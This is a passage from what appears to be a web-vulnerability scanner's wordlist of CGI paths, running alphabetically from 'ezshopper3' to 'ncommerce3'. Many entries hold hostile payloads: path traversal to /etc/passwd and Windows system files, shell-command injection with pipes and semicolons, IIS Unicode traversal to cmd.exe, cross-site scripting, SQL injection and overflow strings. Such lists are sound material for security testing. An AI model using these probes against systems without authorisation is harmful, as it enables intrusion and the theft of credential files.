/cgi-bin/ezshopper3/loadpage.cgi
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=|id|
/cgi-bin/faqmanager.cgi
/cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
/cgi-bin/faxsurvey
/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
/cgi-bin/faxsurvey?cat%20/etc/passwd
/cgi-bin/fexplore.exe
/cgi-bin/fexplore.exe 
/cgi-bin/filemail
/cgi-bin/filemail.cgi
/cgi-bin/filemail.pl
/cgi-bin/filemail.pl 
/cgi-bin/files.pl
/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
/cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
/cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
/cgi-bin/fileseek.cgi?head=;id|
/cgi-bin/fileseek.cgi?head=head.htm&foot=;id|
/cgi-bin/fileseek.cgi?head=|set|
/cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
/cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
/cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
/cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
/cgi-bin/file_upload.pl
/cgi-bin/finger
/cgi-bin/finger.cgi
/cgi-bin/finger.pl
/cgi-bin/finger.pl?ADDR=|id|
/cgi-bin/finger?@localhost
/cgi-bin/flexform
/cgi-bin/flexform.cgi
/cgi-bin/flexform.pl
/cgi-bin/fom.cgi?file=
/cgi-bin/fom/fom.cgi?cmd=&file=1&keywords=vulnerable
/cgi-bin/foo.cmd?xxx&dir
/cgi-bin/foobar
/cgi-bin/foobar.asp/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir+c:%5c
/cgi-bin/foobar.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir+c:%5c
/cgi-bin/form-to-mail.cgi?_out_file=mungo.dat&x=y
/cgi-bin/form.cgi
/cgi-bin/form.cgi?to=blah@blah.com
/cgi-bin/form.dat
/cgi-bin/form.pl
/cgi-bin/FormHandler.cgi
/cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
/cgi-bin/formhandler/formhandler.cgi
/cgi-bin/formmail
/cgi-bin/formmail.cgi
/cgi-bin/formmail.cgi?env_report=/etc/passwd&recipient=email@host.com&required=&firstname=&lastname=&email=&message=&Submit=hi
/cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
/cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=nessus@localhost&subject=test
/cgi-bin/formmail.log
/cgi-bin/formmail.pl
/cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
/cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=nessus@localhost&subject=test
/cgi-bin/formmail2.cgi
/cgi-bin/formmail2.pl
/cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
/cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=nessus@localhost&subject=test
/cgi-bin/formnow.cgi
/cgi-bin/formprocessor.asp?MailTo=test@test.com&MailFrom=test@test.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/formto.pl
/cgi-bin/Formvar.exe
/cgi-bin/fortune
/cgi-bin/forum-admin.pl
/cgi-bin/forum.pl
/cgi-bin/forum.pl?/etc/passwd
/cgi-bin/forum.pl?|id|
/cgi-bin/forum/ubb_library.pl
/cgi-bin/forum/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/cgi-bin/forumdisplay.cgi
/cgi-bin/forums/dcboard.cgi
/cgi-bin/forums/list.php?f=DESIRED_PHP_FILE_WITHOUT_EXTENSION
/cgi-bin/forums/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/cgi-bin/foxweb.dll
/cgi-bin/foxweb.exe
/cgi-bin/Fpadmcgi.exe
/cgi-bin/fpadmin.htm
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/fpexplore.exe?/c%20dir%20c:\
/cgi-bin/fpremadm.exe
/cgi-bin/fpsrvadm.exe
/cgi-bin/fruity_sub.pl
/cgi-bin/ftp.cgi
/cgi-bin/ftp.pl
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc/passwd
/cgi-bin/ftpcgi
/cgi-bin/ftpdiag.cgi
/cgi-bin/FtpSave.dll
/cgi-bin/fuck.exe
/cgi-bin/functions.inc
/cgi-bin/futureforum.cgi
/cgi-bin/futureforum3.cgi
/cgi-bin/gallery.php
/cgi-bin/gbmail.exe
/cgi-bin/gbook.cgi
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/gbook/
/cgi-bin/gbook/gbook.cgi
/cgi-bin/gbook/gbook.cgi?_MAILTO=check;id
/cgi-bin/gbrowse
/cgi-bin/generate.cgi
/cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
/cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
/cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
/cgi-bin/get16.exe
/cgi-bin/get32.exe
/cgi-bin/getcomments.pl
/cgi-bin/getdoc.cgi
/cgi-bin/GetFile.cfm
/cgi-bin/gettext.pl
/cgi-bin/gettransbitmap
/cgi-bin/gettransbitmap?NONEXISTENTPAGE
/cgi-bin/gH.cgi
/cgi-bin/glimpse
/cgi-bin/glimpse|glimpse|
/cgi-bin/global.cgi
/cgi-bin/global.inc
/cgi-bin/gm-authors.cgi
/cgi-bin/gm-cplog.cgi
/cgi-bin/gm.cgi
/cgi-bin/gnujsp/[dirname]/[file]
/cgi-bin/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd
/cgi-bin/groupcp.php
/cgi-bin/guest.cgi
/cgi-bin/guestadd.pl
/cgi-bin/guestbook-cgi
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.cgi 
/cgi-bin/guestbook.cgi?user=cpanel&template=|cat+/etc/passwd
/cgi-bin/guestbook.pl
/cgi-bin/guestbook/
/cgi-bin/guestbook/passwd
/cgi-bin/guestbookcgi
/cgi-bin/guestbooksaver.cgi
/cgi-bin/guestserver.cgi
/cgi-bin/guestserver.cgi?email=|ls|test@test.com
/cgi-bin/gw5/
/cgi-bin/gw5/?HELP=bad-request
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GW5/GWWEB.EXE?HELP=somewhereovertherainbow
/cgi-bin/GW5/US/GWWEB.EXE?HELP=somewhereovertherainbow
/cgi-bin/hamweather/
/cgi-bin/hamweather/hamweather.cgi
/cgi-bin/handler
/cgi-bin/handler%20SH
/cgi-bin/handler.cgi
/cgi-bin/handler/netsonar;cat	/etc/passwd|?data=Download
/cgi-bin/handler/useless_****;ls%20-lFa%20/etc|?data=Download
/cgi-bin/handler/useless_thing;ls%20-lFa%20/etc|?data=Download
/cgi-bin/hc/login.htm
/cgi-bin/hello.bat
/cgi-bin/hello.bat?&dir+c:\
/cgi-bin/helpout.exe
/cgi-bin/hints.cgi
/cgi-bin/hints.pl
/cgi-bin/hints/hints.cgi
/cgi-bin/hints/hints.pl
/cgi-bin/hitview.cgi
/cgi-bin/hobbit.txt
/cgi-bin/Hosting/sqlbrowse.asp?filepath=c:\&Opt=3
/cgi-bin/HostingController/sqlbrowse.asp?filepath=c:\&Opt=3
/cgi-bin/howcat.php?catid=<script>alert('XSS')</script>
/cgi-bin/hsx
/cgi-bin/hsx.cgi
/cgi-bin/hsx.cgi?show=../../../../../../../../../../../../etc/passwd%00
/cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
/cgi-bin/hsx.cgi?show=..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
/cgi-bin/htgrep
/cgi-bin/htgrep.cgi?file=index.html&hdr=/etc/passwd
/cgi-bin/htgrep/file=index.html&hdr=/etc/passwd
/cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
/cgi-bin/htimage.exe
/cgi-bin/htimage.exe/path/filename?0,0
/cgi-bin/htimage.exe?2,2
/cgi-bin/html2chtml.cgi
/cgi-bin/html2wml.cgi
/cgi-bin/htmldocs
/cgi-bin/htmlscript
/cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
/cgi-bin/htmlscript?../../../../etc/passwd
/cgi-bin/htmlscript|htmlscript|
/cgi-bin/html_page?TEMPLATE=main
/cgi-bin/htpasswd2
/cgi-bin/htsearch
/cgi-bin/htsearch.cgi?words=
/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28524%29%3C%2Fscript%3E
/cgi-bin/htsearch?-c/nonexistant
/cgi-bin/htsearch?config=../../../../../../../../../../etc/passwd
/cgi-bin/htsearch?config=aaa
/cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
/cgi-bin/htsearch?config=htdig;words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
/cgi-bin/htsearch?exclude=%60/etc/passwd%60
/cgi-bin/htsearch?words=%22%3E%3Cscript%3Ealert%28526%29%3C%2Fscript%3E
/cgi-bin/httpext.dll
/cgi-bin/httpodbc.dll
/cgi-bin/hwadmin5340/
/cgi-bin/hwadmin5340/hwadmin.cgi
/cgi-bin/ibill.pm
/cgi-bin/ibillpm.pl
/cgi-bin/icat
/cgi-bin/icat.pl
/cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls
/cgi-bin/idq.dll
/cgi-bin/if/admin/nph-build.cgi?step=<script>alert("SecurityHole")</script>
/cgi-bin/iisadmin
/cgi-bin/iisadmin/
/cgi-bin/iisadmin/bdir.htr
/cgi-bin/iisadmin/bdir.htr??c:\
/cgi-bin/iisadmin/bdir.htr?dir=ht??c:\
/cgi-bin/iisadmin/default.htm
/cgi-bin/iisadmin/ism.dll
/cgi-bin/iisadmin/ism.dll?http/dir
/cgi-bin/iisadmin/samples/ctgestb.htx
/cgi-bin/iisadmin/samples/ctgestb.idc
/cgi-bin/iisadmin/samples/details.htx
/cgi-bin/iisadmin/samples/details.idc
/cgi-bin/iisadmin/samples/query.htx
/cgi-bin/iisadmin/samples/query.idc
/cgi-bin/iisadmin/samples/register.htx
/cgi-bin/iisadmin/samples/register.idc
/cgi-bin/iisadmin/samples/sample.htx
/cgi-bin/iisadmin/samples/sample.idc
/cgi-bin/iisadmin/samples/sample2.htx
/cgi-bin/iisadmin/samples/sample2.idc
/cgi-bin/iisadmin/samples/viewbook.htx
/cgi-bin/iisadmin/samples/viewbook.idc
/cgi-bin/iisadmin/tools
/cgi-bin/iisadmin/tools/ct.htx
/cgi-bin/iisadmin/tools/ctss.idc
/cgi-bin/iisadmin/tools/dsnform.exe
/cgi-bin/iisadmin/tools/getdrvrs.exe
/cgi-bin/iisadmin/tools/mkilog.exe
/cgi-bin/iisadmin/tools/newdsn.exe
/cgi-bin/iisadminbdir.htr
/cgi-bin/IISADMPWD
/cgi-bin/ikonboard/
/cgi-bin/ikonboard/help.cgi
/cgi-bin/ikonboard/help.cgi?
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
/cgi-bin/imageFolio.cgi?direct=<script>alert("SecurityHole")</script>
/cgi-bin/imageFolio.cgi?direct=<script>alert("XSS")</script>
/cgi-bin/imageFolio.cgi?direct=<script>alert('XSS')</script>
/cgi-bin/ImageFolio/admin/admin.cgi
/cgi-bin/imagefolio/admin/admin.cgi?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc
/cgi-bin/imagefolio/cgi-bin/admin/setup.cgi
/cgi-bin/imagemap
/cgi-bin/imagemap.cgi
/cgi-bin/imagemap.exe
/cgi-bin/imagemap.exe?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
/cgi-bin/imapcern.exe
/cgi-bin/imapncsa.exe
/cgi-bin/inc/sendmail.inc
/cgi-bin/include.cgi?/etc/passwd
/cgi-bin/include.cgi?|id|
/cgi-bin/include.inc
/cgi-bin/include/customize.php?l=httpw.example.com/nofile.txt
/cgi-bin/includes/functions/pmwh.php
/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/index.cgi?mode=album&album=../../../../../../../../../../../../../../../../../etc/
/cgi-bin/index.js0x70
/cgi-bin/index.php3?vhosts=http://go.to
/cgi-bin/index.php?board=;action=login2&user=test&cookielength=120&passwrd=<script>alert()</script>
/cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd
/cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc
/cgi-bin/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
/cgi-bin/info.cgi
/cgi-bin/info.txt
/cgi-bin/info2.txt
/cgi-bin/info2html
/cgi-bin/info2www
/cgi-bin/info2www '(../../../../../../../bin/mail root </etc/passwd>
/cgi-bin/info2www?`(../../../../../../../../ls%20-lFa%20/etc|)`
/cgi-bin/infogate
/cgi-bin/infosrch.cgi
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/cat%20/etc/group
/cgi-bin/input
/cgi-bin/input.bat
/cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/cgi-bin/input/
/cgi-bin/input2.bat
/cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/cgi-bin/inserter.cgi?/etc/passwd
/cgi-bin/inserter.cgi?|id|
/cgi-bin/INSTALL
/cgi-bin/install.htm
/cgi-bin/INSTALL.html
/cgi-bin/install.log
/cgi-bin/INSTALL.mysql.txt
/cgi-bin/INSTALL.pgsql.txt
/cgi-bin/INSTALL.txt
/cgi-bin/install.xml
/cgi-bin/intershop.siteadmin
/cgi-bin/intranet.html
/cgi-bin/inventory.dbf
/cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
/cgi-bin/ion-p.exe?page=ct.ini
/cgi-bin/ion-p?page=../../../../../etc/passwd
/cgi-bin/ion-p?page=/etc/services
/cgi-bin/ipf/etc/gfw/ui/pwd.dat
/cgi-bin/ipswitch.ini
/cgi-bin/isapi/srch.htm
/cgi-bin/issadmin/bdir.htr
/cgi-bin/Iwgate.pl
/cgi-bin/jammail.pl?job=showoldmail&mail=|command|
/cgi-bin/jammail.pl?job=showoldmail&mail=|id|
/cgi-bin/jenv.cgi
/cgi-bin/jj
/cgi-bin/jj.cgi
/cgi-bin/journal.cgi?folder=journal.cgi%00
/cgi-bin/jrun.ini
/cgi-bin/kaiseki.cgi?|id|
/cgi-bin/ksh
/cgi-bin/lasso.cgi
/cgi-bin/lastlines.cgi?process
/cgi-bin/lastlines.cgi?process&num_lines=1000&log_location=../../../../../../../../../../etc/passwd
/cgi-bin/lb5000/search.cgi
/cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net
/cgi-bin/license.txt
/cgi-bin/link1s.pl
/cgi-bin/links.pl
/cgi-bin/listrec.pl
/cgi-bin/lmail.pl
/cgi-bin/loadpage.cgi
/cgi-bin/loadpage.cgi?id=|id|
/cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
/cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/cgi-bin/localstart.asp
/cgi-bin/log-reader.cgi
/cgi-bin/log.asp
/cgi-bin/log.cgi
/cgi-bin/log.htm
/cgi-bin/log.html
/cgi-bin/log.php
/cgi-bin/log.txt
/cgi-bin/log/
/cgi-bin/log/mastergate
/cgi-bin/log/nether-log.pl
/cgi-bin/log/nether-log.pl?checkit
/cgi-bin/login.asp
/cgi-bin/Login.aspx
/cgi-bin/login.cgi
/cgi-bin/login.dbf
/cgi-bin/Login.do
/cgi-bin/login.htx
/cgi-bin/login.php
/cgi-bin/login.pl
/cgi-bin/login.pl?course_id=\
/cgi-bin/logit.cgi
/cgi-bin/logon.cgi
/cgi-bin/logon.htm
/cgi-bin/logon.html
/cgi-bin/logon.pl
/cgi-bin/logs
/cgi-bin/logs.asp
/cgi-bin/logs.cgi
/cgi-bin/logs.htm
/cgi-bin/logs.html
/cgi-bin/logs.php
/cgi-bin/logs.pl
/cgi-bin/logs/
/cgi-bin/logs/access_log
/cgi-bin/logs/htpasswd
/cgi-bin/logs/mastergate
/cgi-bin/LongList.CGI
/cgi-bin/lookup.cgi?lookup=|id|
/cgi-bin/lookwho.cgi
/cgi-bin/ls
/cgi-bin/lsin.exe
/cgi-bin/lsindex2.bat
/cgi-bin/lwgate
/cgi-bin/lwgate.cgi
/cgi-bin/lwgate.pl
/cgi-bin/lwgate/lwgate
/cgi-bin/lwgate/lwgate.cgi
/cgi-bin/LWGate/lwgate.pl
/cgi-bin/lyris.pl
/cgi-bin/MachineInfo
/cgi-bin/magiccard.cgi
/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd
/cgi-bin/mail
/cgi-bin/mail.cgi
/cgi-bin/mail.pl   
/cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/mail/mailmachine.cgi
/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../..
/cgi-bin/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
/cgi-bin/mailengine.pl
/cgi-bin/mailfile.cgi
/cgi-bin/mailfile?MailTo=test@test.com&FileName=mailfile:c&Subject=tst&MailFrom=tst@no.net
/cgi-bin/mailform.cgi
/cgi-bin/mailform.exe
/cgi-bin/mailform.pl
/cgi-bin/mailit.pl
/cgi-bin/maillist.cgi
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html=
/cgi-bin/maillist.pl
/cgi-bin/maillist.pl 
/cgi-bin/mailmachine.cgi
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/mailme.exe
/cgi-bin/mailmepro.exe
/cgi-bin/mailnews.cgi
/cgi-bin/MailPost.exe
/cgi-bin/mailsend.exe
/cgi-bin/mailto.cgi
/cgi-bin/mailto.exe
/cgi-bin/mailto.pl
/cgi-bin/mailto?MailTo=test@test.com&text=tst&EmailForm=/cgi-bin/mailto
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=
/cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
/cgi-bin/MAINTAINERS.txt
/cgi-bin/main_menu.pl
/cgi-bin/majordomo.pl
/cgi-bin/makebook.cgi
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/makedld.cgi
/cgi-bin/Makefile
/cgi-bin/mall2000.cgi
/cgi-bin/man-cgi
/cgi-bin/man-cgi?%20/etc/group%20
/cgi-bin/man.cgi?man=ls;id;pwd;
/cgi-bin/man.sh
/cgi-bin/man.sh 
/cgi-bin/math_sum.mscgi?a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/cgi-bin/mclient.cgi?p=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2887%2C97%2C116%2C99%2C104%2C102%2C105%2C114%2C101%2C32%2C88%2C83%2C83%2C32%2C84%2C101%2C115%2C116%2C32%2C83%2C117%2C99%2C99%2C101%2C115%2C115%2C102%2C117%2C108%29%29%3C%2Fscript%3E
/cgi-bin/mdma.bat
/cgi-bin/members.dbf
/cgi-bin/message.cgi
/cgi-bin/meta.pl
/cgi-bin/mgrqcgi
/cgi-bin/midicart.mdb
/cgi-bin/minimal.exe
/cgi-bin/miniserv.pl
/cgi-bin/mini_logger.cgi
/cgi-bin/mkilog.exe
/cgi-bin/mkplog.exe
/cgi-bin/mlog.phtml
/cgi-bin/mmstdod.cgi
/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=
/cgi-bin/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/cgi-bin/moin.cgi
/cgi-bin/mojo.cgi?flavor=subscribe&email=""><script>alert('XSS')</script>&list=skazat_design_newsletter&submit=Submit
/cgi-bin/mojo/mojo.cgi
/cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini
/cgi-bin/mrtg.cgi?cfg=blah
/cgi-bin/MsmMask.exe
/cgi-bin/MsmMask.exe?mask=/
/cgi-bin/MsmMask.exe?mask=/junk334
/cgi-bin/msn.cgi
/cgi-bin/ms_proxy_auth_query/
/cgi-bin/mt-static/
/cgi-bin/mt-static/mt-check.cgi
/cgi-bin/mt-static/mt-load.cgi
/cgi-bin/mt/
/cgi-bin/mt/mt-check.cgi
/cgi-bin/mt/mt-load.cgi
/cgi-bin/multihtml.pl
/cgi-bin/multihtml.pl?multi=/etc/passwd%00html
/cgi-bin/mwf/
/cgi-bin/mwf/user_options_x.pl
/cgi-bin/myguestbook.cgi?action=view
/cgi-bin/myNonExistentFile
/cgi-bin/nbmember.cgi?cmd=test
/cgi-bin/nc.exe
/cgi-bin/ncbook/book.cgi?action=default&current=|ls|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-bin/ncommerce/
/cgi-bin/ncommerce3/
/cgi-bin/ncommerce3/ExecMacro/macro.d2w
/cgi-bin/ncommerce3/ExecMacro/macro.d2w/
/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A